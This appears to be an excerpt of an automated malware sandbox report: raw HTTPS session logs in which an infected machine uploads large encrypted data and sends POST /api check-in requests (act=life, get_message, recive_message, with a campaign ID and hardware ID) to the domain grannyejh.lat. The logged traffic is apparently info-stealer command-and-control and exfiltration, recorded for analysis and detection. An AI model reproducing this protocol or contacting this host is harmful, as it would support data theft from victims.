                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: f2 69 45 52 30 06 91 4e cc e3 de 99 da 38 ef 42 42 a0 44 41 97 95 2c 5c 2c 9f 8a e0 3d d8 c9 7e 80 6a 33 60 74 20 07 a4 cc f2 00 f5 09 69 b4 9f aa 59 66 22 db a6 34 9b fc 5d 87 6b be 85 3c 3b e1 cc f2 ca 6d 8e f2 71 30 8d 41 ca 7c 71 a4 e2 de df 27 3e 1e 4d 11 e9 14 fd b6 71 f8 1e 78 5f 2f 48 5a 14 14 4c bb 1c 13 fc 66 2a 6a 29 65 f9 4a 1d 39 1d 72 e5 35 10 c1 0b d3 fb ae 3b 54 59 61 20 68 7a b5 5a 69 33 0e c1 08 07 84 e3 b9 71 f8 8d 5f 4d 6a 9a 19 c6 3a d2 fd 17 b5 5c 6d 83 e3 47 ab 8b db eb eb 8c c3 1e 2b 11 be 40 f5 9f 40 f4 0f 09 ef d2 75 96 04 b4 8f cd 4b 51 16 9d 84 3e 8a 44 5b aa f8 e2 df 5c 23 f2 6c 79 0b 94 e2 2e f7 64 fa 63 35 b0 e0 eb fd 27 b0 ea 94 cb 9a b8 a1 ed 6c 52 75 40 5e c5 42 44 ec 20 5a 50 8f b1 50 b3 13 ce 7c ef 68 38 97 91 a1 f5 a5
                                                                                                                                                                                                                                                          Data Ascii: iER0N8BBDA,\,=~j3`t iYf"4]k<;mq0A|q'>Mqx_/HZLf*j)eJ9r5;TYa hzZi3q_Mj:\mG+@@uKQ>D[\#ly.dc5'lRu@^BD ZPP|h8
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: 0e eb b5 4f e7 9e 30 3c 8e a5 d5 5c a5 88 80 31 63 65 1c 08 bd d4 44 a3 d5 06 8a 33 ec 6a 8a 6b bc 8e 1c d3 c4 38 4a 69 ac c6 1d 0a e8 78 01 c8 07 b6 64 17 f2 06 fd e7 4c d2 2f 23 01 f6 a5 38 cf 6e 46 f4 f6 32 cd 8a 66 2b 0a 5e ac 2d 13 e7 83 5c df ff 99 fe 64 20 70 50 ad 70 44 ae 70 58 fc f1 5d 51 1c b7 ff 1a 6d cf 91 9c be a7 ae bb 07 14 f8 de 96 ea 37 88 f3 0d ec 25 7d 0a e5 97 39 41 b3 8e cf 2d ec 8d d9 6a 97 bc 76 bb ee f5 3b cb b0 71 62 b1 31 14 fc b2 82 31 d8 5f 7b 66 15 22 77 01 fa 9d 7d d2 7a 4a fb 30 83 53 bf b9 c2 4e 6b 8a 24 1d 09 8a 5d d7 dc 1e 19 e0 82 d4 0d d8 81 08 b0 fe cf 8b ca c3 08 2a ea fe 47 2f ad 06 70 fc e2 af b3 e3 97 43 89 85 ef 71 bb 1e 9f f3 19 86 fa 03 5b 02 98 4d 7b 0f 56 4b 01 b7 8b f4 ae 26 a8 e8 07 d1 ac 02 47 e6 ff be 3b
                                                                                                                                                                                                                                                          Data Ascii: O0<\1ceD3jk8JixdL/#8nF2f+^-\d pPpDpX]Qm7%}9A-jv;qb11_{f"w}zJ0SNk$]*G/pCq[M{VK&G;
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: d0 14 41 bd 1e 35 41 da ed 12 3d 8c 2a 06 84 da 3f 0a 5b bf a1 fa 24 e6 6d 7a 0f e8 73 0e ff 9b 69 13 4b 14 b6 15 0b ca d9 87 62 7a 80 02 7c ce 0f fe 7d e4 26 38 d3 d1 9b 13 48 a2 cc 89 6d 25 fc 2e b0 eb 32 72 25 b4 f5 47 3a e9 44 9f 9f a3 f2 75 fc 58 82 31 ef 74 e6 56 53 09 d3 e3 89 25 76 66 b2 e9 6b dc bf c3 f4 f3 4b a9 27 e8 09 f3 b0 1b 23 07 76 ed 42 59 5e 7e 80 3d 12 f9 bf 48 1b f6 90 1a f3 76 39 cb 67 d6 e7 e7 d6 f2 b2 fb a3 c5 32 03 c1 b9 bf 94 0a 80 77 e2 bb 37 a9 80 43 9e b5 8b f4 8c c8 f9 23 1e af 72 5c 36 45 ef 20 e9 6c 06 61 57 b6 3a 6c 30 38 74 fc 9f 06 fd bf 0b fc da 1e df d1 76 e7 10 87 fe 3b 71 67 0b 80 af 22 ec 1d 72 ba ee 53 c5 26 9e ff 06 7c b3 6d ff ea c0 ce c0 ae ed 61 29 88 fc 76 ec 2a 59 b9 61 6b d8 78 8e 1b 75 fb ac 8e bc 2c 45 5b
                                                                                                                                                                                                                                                          Data Ascii: A5A=*?[$mzsiKbz|}&8Hm%.2r%G:DuX1tVS%vfkK'#vBY^~=Hv9g2w7C#r\6E laW:l08tv;qg"rS&|ma)v*Yakxu,E[
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: 25 90 e6 01 4a 8b d5 8e ee 07 79 7d 1c 26 11 dc 45 63 04 ab 2a d7 97 1f 0b c8 45 0a f4 44 ad a5 2b a2 19 36 11 2c 32 60 5c 55 a2 fd f1 a4 cf 11 aa a8 27 8d 25 20 37 b5 ac 82 9b 47 b5 11 ee 85 b2 d9 0f d4 0d 9d ee a7 fa 58 af 1c f9 00 7c 3f 1f a6 4e e5 55 6e af cb bc 2f 19 e6 2f 8b 9e 89 43 37 33 d7 ed eb 5c 75 40 c2 ea bb 91 11 e8 6a 63 af bd 1e 7a fe 74 53 34 c8 42 87 cc eb 74 d3 cd ef 52 27 81 fa 1e a8 65 16 51 b6 13 00 c3 89 12 5f 3f 2d bd 35 83 6c 2d 66 64 e3 e5 a4 6d 27 ff a6 bf 6b 5f 64 02 6a f4 07 d7 b3 91 cf ab 71 f3 bc 72 c1 db 6c 3c 46 f6 d6 6c 4e fa 5a 6a ab c7 67 5c e2 d7 82 02 c9 d9 76 a4 fa 90 5e 4e e7 7e ab 7b d4 60 f8 0c 13 0d 9a 4b 38 13 bf 76 d5 b9 de 94 9c 13 11 ae 92 49 3d af 12 43 0e 1a 11 a4 7e 81 4f cf dd 8b b8 29 b6 81 65 b7 fe 42
                                                                                                                                                                                                                                                          Data Ascii: %Jy}&Ec*ED+6,2`\U'% 7GX|?NUn//C73\u@jcztS4BtR'eQ_?-5l-fdm'k_djqrl<FlNZjg\v^N~{`K8vI=C~O)eB
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: 72 97 58 b9 6c e4 d8 b4 1e 3b 28 0d 9e 70 d0 cf 49 c4 1e ba 6a 11 68 8a e7 ad 23 05 e6 00 07 dd d5 f3 c1 c7 b5 68 7c ed 47 cb 86 c9 c6 bf 63 94 f0 9b 7f fd bb 32 d3 37 c9 dc ec ac e4 6d f0 c7 d1 fb b9 a3 bc 3d af 42 97 b9 82 20 fa 4a a0 82 ca 09 55 f0 79 91 ea 80 d8 68 e7 00 fb fb d1 ab 6f 04 c1 cc 55 1c 60 de e2 45 b9 9f e5 90 22 04 4a 42 88 7a 1f 01 2b c9 89 0f 3e 3d 7d 87 77 ba b7 53 6c aa 01 0b 77 86 fb 1d 07 d4 b1 31 34 2c 9b 5e 0c 92 27 34 f0 5e 8d f3 e6 9c 20 db 95 2b 31 2a d7 5e 5d 22 4a a3 bf fe da 28 7f e5 f7 fe 55 e3 8f 96 cf e8 5b bd 61 eb 46 14 be 50 01 e1 43 c5 31 71 4f d7 9f 48 af 6b 84 7f f8 eb e9 bb 89 f9 70 0d 13 dd 7d 3c 58 4d 4c e6 61 61 eb 4b 93 10 ab 5d 2b 86 fe 5b e3 ae 72 40 01 77 33 30 ed 6f 28 fb 18 76 be ff 60 db 01 c0 f9 3d 62
                                                                                                                                                                                                                                                          Data Ascii: rXl;(pIjh#h|Gc27m=B JUyhoU`E"JBz+>=}wSlw14,^'4^ +1*^]"J(U[aFPC1qOHkp}<XMLaaK]+[r@w30o(v`=b
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: b5 cf 58 54 49 20 5e 3f af 95 82 35 3e a5 09 b0 7b 2f e2 cc 69 16 d6 b7 3b 32 7e 09 1e a3 49 7f 33 83 01 44 a2 7c a3 11 c9 60 c5 1e 21 ce f7 bc 33 cd 8e 10 85 b4 25 68 00 61 17 ef a0 a8 4c 38 48 a0 3c 04 36 8a 34 0c f0 5f c5 43 2e 12 03 b7 b3 b4 77 9c dd 61 96 9d 59 ce 91 00 b7 69 bb 59 9d fb 72 de 33 3e ac 87 df 4a 5f 18 fa f0 9a 3c bd 61 1b 93 49 b5 1b db ec c4 56 ff b6 74 a3 ef db ae 00 f8 ef 95 11 34 17 96 f9 00 28 3d 90 49 6a 30 49 f5 bd 53 43 a8 20 ec 20 37 17 d8 a8 d4 ea 72 2d 41 72 cd 12 73 17 1a fd 7e 32 a9 08 c8 f2 be df 3f ca 5c 59 14 1b 06 4c b0 42 40 de f6 db 84 d8 ca 02 2d 55 a5 77 36 ad 9d a8 53 e2 5b 47 84 6e 9c c6 25 58 99 28 88 41 8d fa 69 61 fd 28 ed 1c 9f 21 09 d0 71 ab c0 80 a5 01 ce e8 1d 8b 6d 52 2d 34 b1 08 c4 8f d4 4c ed ed 58 a7
                                                                                                                                                                                                                                                          Data Ascii: XTI ^?5>{/i;2~I3D|`!3%haL8H<64_C.waYiYr3>J_<aIVt4(=Ij0ISC 7r-Ars~2?\YLB@-Uw6S[Gn%X(Aia(!qmR-4LX
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: 0b 79 c0 16 07 3f 45 9a f9 20 99 74 e4 a6 20 90 fc f3 ea 79 d9 54 8f 4a cf 2f 99 82 c6 88 75 67 03 2e 1a b3 ce dd 4f d3 0b 40 91 2b ec 29 49 9b d9 bf 4f 54 0f 88 00 ab 03 a4 99 ff 73 9c 2d 49 01 97 81 fd 85 87 76 fe eb af b1 9d 28 be 29 47 f7 f1 40 29 45 5e 14 d6 7b a3 89 3c 2b 7d f1 0a a3 2b c2 48 c6 71 8c 7b 28 6c 5d 97 48 a4 90 ff 56 f4 32 de b2 3e 64 e5 0e b5 dd 29 f8 f2 3b 7a 58 fc 48 94 4c 11 9c d3 62 aa 27 ca 61 d3 4f 96 e5 87 a8 77 2b 94 22 87 5a 12 de aa eb be f6 5f 97 77 de 26 02 3c 8c df 6e 4d 4e e6 7e 85 18 ea e6 a1 40 ef 21 a0 64 a6 55 77 56 95 6b 61 ae 89 22 6c e7 13 76 12 de 5d a4 03 5a 15 69 ab f9 e6 ef a3 a6 ed a0 41 2c 51 74 2f 89 4e 54 70 db d4 72 ab 85 06 3f a3 bd 55 d7 6c ce 65 4a 51 3f 46 50 6f dd 61 88 12 70 3f b7 27 62 48 17 60 c0
                                                                                                                                                                                                                                                          Data Ascii: y?E t yTJ/ug.O@+)IOTs-Iv()G@)E^{<+}+Hq{(l]HV2>d);zXHLb'aOw+"Z_w&<nMN~@!dUwVka"lv]ZiA,Qt/NTpr?UleJQ?FPoap?'bH`
                                                                                                                                                                                                                                                          2024-12-19 13:27:16 UTC15331OUTData Raw: 77 f1 30 e3 fd 4d 6b 5c 09 cb 94 07 43 bf c2 9f 13 ae ef a2 ae ac 93 3d 7e a4 39 3d a8 3a 2a c5 ea 7f 58 78 42 24 f4 13 c4 b4 46 80 4d fb 62 34 1e ee 02 6d c5 c1 52 2c ad 42 05 43 4c e8 85 95 7d 8e 74 cb e7 0f ab 62 a4 17 3a e8 f0 0a 18 96 db 02 52 72 f1 f8 1d 92 5b 64 3c d1 ed 37 46 ef 69 15 f4 38 87 ec 0d 59 fb 9d 54 68 a6 18 7c a0 22 f4 db df 19 5e 07 02 11 88 04 bb de 7c 2d 45 01 8b 6f b0 5d ba 0b 97 a2 37 f0 a9 fc 1f e9 57 05 5e d9 83 f2 20 f0 85 33 60 d9 8e 38 5e e6 99 02 66 2f c6 ab 4b 72 33 00 07 f8 78 c7 88 d4 2b dc 10 c5 cd b5 e0 08 9b 59 65 c9 7b 8e 45 5d 5a 42 48 7e 61 d5 fe 91 91 b4 7b 02 f1 aa 61 3d 6d 22 39 5f 69 bb d2 e4 62 93 49 af 35 50 7c 98 b0 f3 ab 5d 8e 52 55 fd 07 54 48 ba 18 b5 eb 9f b2 0f 1e ee 4d 8a a0 fd 27 13 59 21 0d 72 c2 c7
                                                                                                                                                                                                                                                          Data Ascii: w0Mk\C=~9=:*XxB$FMb4mR,BCL}tb:Rr[d<7Fi8YTh|"^|-Eo]7W^ 3`8^f/Kr3x+Ye{E]ZBH~a{a=m"9_ibI5P|]RUTHM'Y!r
                                                                                                                                                                                                                                                          2024-12-19 13:27:19 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:18 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=jnqaeis1jii0dsc9qcue2ijicv; expires=Mon, 14 Apr 2025 07:13:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fSgTJlsIifKLDtbS3PvIQhMxNAasbbY5BMHLlzhh5IMOd15GgsFROG6Rvkj6SfsbRu3pAemrf5E3mbks7jPwaulBcU2Cs4Ii62f2yCOv16ut7z0WX1aPeqg1GNnFYcy1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47baaa4ae5c338-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1552&rtt_var=600&sent=314&recv=591&lost=0&retrans=0&sent_bytes=2831&recv_bytes=574959&delivery_rate=1796923&cwnd=228&unsent_bytes=0&cid=eb7440da9987bfb2&ts=2403&x=0"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          49192.168.2.450255172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:19 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-19 13:27:20 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:19 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=h0ivpqkut8pt0hnk076m143j08; expires=Mon, 14 Apr 2025 07:13:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUcDxj%2Bejk0XXBECaOkPMKqAUjExp5M3jzzEZSR12QfqIrsGLmFZQgo9Yr5Bm%2BE%2BF4BifDwywgxuFiSuMuabSdsWZrxxsdkbHC%2FabR8lEPzg3AnY%2FblCECB6nb1OlazE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47babb6ff732c7-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1797&rtt_var=694&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1554018&cwnd=137&unsent_bytes=0&cid=fd5af1bedf7b5031&ts=779&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                          2024-12-19 13:27:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          50192.168.2.450260172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:20 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 82
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:20 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=4D9AEFC7455232ACAC8923850305D13E
                                                                                                                                                                                                                                                          2024-12-19 13:27:21 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=bs7k40ud9o1mqe14p9mvd2cdm7; expires=Mon, 14 Apr 2025 07:13:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KakrAYuuNaYOKDFD506yBHpmhw%2FPgr3yndSP%2BbG7LJ28bhjCCPLs%2BwpXNd%2BRrKQ4jr8hOgdsLqNAuaveZSgyr6EX%2B4DYRUQB%2BnEeLH04jfTUvK1tFAKFkalGZ0ZhAPRC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47bac19e030f64-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1674&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=979&delivery_rate=1641371&cwnd=233&unsent_bytes=0&cid=af70d1e166069a07&ts=765&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:21 UTC214INData Raw: 64 30 0d 0a 4c 38 58 2b 49 57 74 6d 46 41 42 32 78 32 4b 4c 66 4b 36 4a 6e 71 47 34 49 35 6b 4c 64 69 57 38 6d 54 41 74 39 37 77 2b 56 61 56 30 76 74 78 55 53 56 77 32 61 41 4b 7a 45 72 45 67 67 64 57 78 6b 49 41 57 74 7a 6c 48 45 4a 4b 6f 41 52 37 5a 6a 51 67 4a 69 6b 43 6a 6d 48 31 45 41 6e 46 6d 57 4b 49 61 37 6c 36 43 71 2f 6a 56 6d 68 6d 70 4a 31 52 41 6e 71 4d 41 55 4e 76 48 48 43 43 48 46 65 65 57 56 52 38 57 4c 6c 78 5a 6d 30 32 36 52 4a 75 6e 72 4a 43 4e 44 61 67 36 52 51 75 4e 72 32 77 43 68 4d 68 62 4e 4d 68 7a 36 6f 78 41 42 51 4a 37 62 56 69 69 47 75 35 65 67 71 76 34 31 5a 6f 5a 71 53 64 55 51 4a 36 6a 41 46 43 71 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: d0L8X+IWtmFAB2x2KLfK6JnqG4I5kLdiW8mTAt97w+VaV0vtxUSVw2aAKzErEggdWxkIAWtzlHEJKoAR7ZjQgJikCjmH1EAnFmWKIa7l6Cq/jVmhmpJ1RAnqMAUNvHHCCHFeeWVR8WLlxZm026RJunrJCNDag6RQuNr2wChMhbNMhz6oxABQJ7bViiGu5egqv41ZoZqSdUQJ6jAFCq
                                                                                                                                                                                                                                                          2024-12-19 13:27:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          51192.168.2.450264172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:21 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 47
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:21 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:21 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=sovih6ijf4i6oiiccs52chju1l; expires=Mon, 14 Apr 2025 07:14:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sPjStTSQ8xQAzac%2FYzE1SYG0eN7GTZvVFy4Wvs%2BJYM0s0kT0HuGhqib%2BTHoFB8GIGOwGg9q96AaiUqKYO6OE3%2FXzsSBc3u1BJymaI0NF2SzxAJA2o8wT6YUyM7p2SBch"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47bac7d8756a50-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1748&rtt_var=670&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=944&delivery_rate=1616832&cwnd=234&unsent_bytes=0&cid=bd76e68f789ebed0&ts=770&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC250INData Raw: 34 36 37 0d 0a 2f 4a 7a 31 31 47 59 79 45 32 75 4d 31 31 71 54 36 70 51 35 73 69 5a 75 67 6e 59 31 46 6a 73 6b 70 6a 38 79 50 76 58 6c 4e 4c 53 48 76 6f 50 32 58 41 59 2f 53 66 2b 79 65 4b 6d 65 35 6b 7a 58 43 6b 7a 6a 45 68 63 73 58 55 58 4b 54 46 63 53 31 35 4e 5a 6c 73 62 36 6c 4c 67 56 56 7a 39 4a 36 61 39 34 71 62 48 76 47 39 64 49 54 4c 68 55 55 48 78 5a 52 63 70 64 55 31 57 61 6c 56 6a 58 6c 50 43 53 76 41 4e 52 64 77 72 67 75 6a 2f 32 6a 2f 56 54 33 45 38 44 36 68 73 58 4f 68 6c 42 33 42 30 49 48 4c 69 41 51 4e 57 78 2f 59 61 2f 52 45 38 2f 45 4b 36 79 4e 4c 48 51 74 6c 6a 58 52 41 4c 6b 45 6c 35 2b 55 30 7a 43 58 46 5a 55 68 59 78 53 33 4a 54 2b 6b 62 30 4a 57 47 4d 48 36 72 30 30 38 49 58 31 47 35 34 45 43 2f 68 55 44 7a 51 4b 64
                                                                                                                                                                                                                                                          Data Ascii: 467/Jz11GYyE2uM11qT6pQ5siZugnY1Fjskpj8yPvXlNLSHvoP2XAY/Sf+yeKme5kzXCkzjEhcsXUXKTFcS15NZlsb6lLgVVz9J6a94qbHvG9dITLhUUHxZRcpdU1WalVjXlPCSvANRdwrguj/2j/VT3E8D6hsXOhlB3B0IHLiAQNWx/Ya/RE8/EK6yNLHQtljXRALkEl5+U0zCXFZUhYxS3JT+kb0JWGMH6r008IX1G54EC/hUDzQKd
                                                                                                                                                                                                                                                          2024-12-19 13:27:22 UTC884INData Raw: 4d 64 4d 51 55 6d 61 6c 31 43 57 67 62 43 4f 39 67 4e 63 4d 56 47 75 76 54 54 2f 6a 66 56 55 31 30 55 4d 38 68 74 58 64 31 46 4f 77 46 64 66 55 35 69 4a 58 4e 47 57 39 35 43 35 41 31 68 33 42 75 33 31 64 72 47 50 37 68 75 49 42 43 7a 77 46 31 52 67 56 46 65 45 51 68 35 46 31 34 42 61 6c 73 61 2b 6b 62 67 46 58 58 45 62 35 72 34 7a 39 4a 72 39 55 74 31 4a 44 4f 30 65 57 48 64 5a 51 63 35 58 58 31 61 54 69 6c 76 51 6e 76 37 58 2b 45 52 58 61 55 6d 32 39 52 76 30 6d 50 46 58 78 67 59 32 6f 41 73 5a 62 52 6c 42 79 42 30 49 48 4a 2b 43 56 64 57 56 38 5a 53 2b 44 30 4a 78 47 2b 69 34 50 65 4f 4f 38 31 58 61 52 78 37 71 47 6c 46 33 55 45 33 4e 57 46 64 59 31 38 6b 57 30 59 61 2b 7a 2f 59 6c 58 58 6f 46 35 4b 49 34 73 5a 65 34 51 70 42 44 41 4b 42 4d 46 33 42 59
                                                                                                                                                                                                                                                          Data Ascii: MdMQUmal1CWgbCO9gNcMVGuvTT/jfVU10UM8htXd1FOwFdfU5iJXNGW95C5A1h3Bu31drGP7huIBCzwF1RgVFeEQh5F14Balsa+kbgFXXEb5r4z9Jr9Ut1JDO0eWHdZQc5XX1aTilvQnv7X+ERXaUm29Rv0mPFXxgY2oAsZbRlByB0IHJ+CVdWV8ZS+D0JxG+i4PeOO81XaRx7qGlF3UE3NWFdY18kW0Ya+z/YlXXoF5KI4sZe4QpBDAKBMF3BY
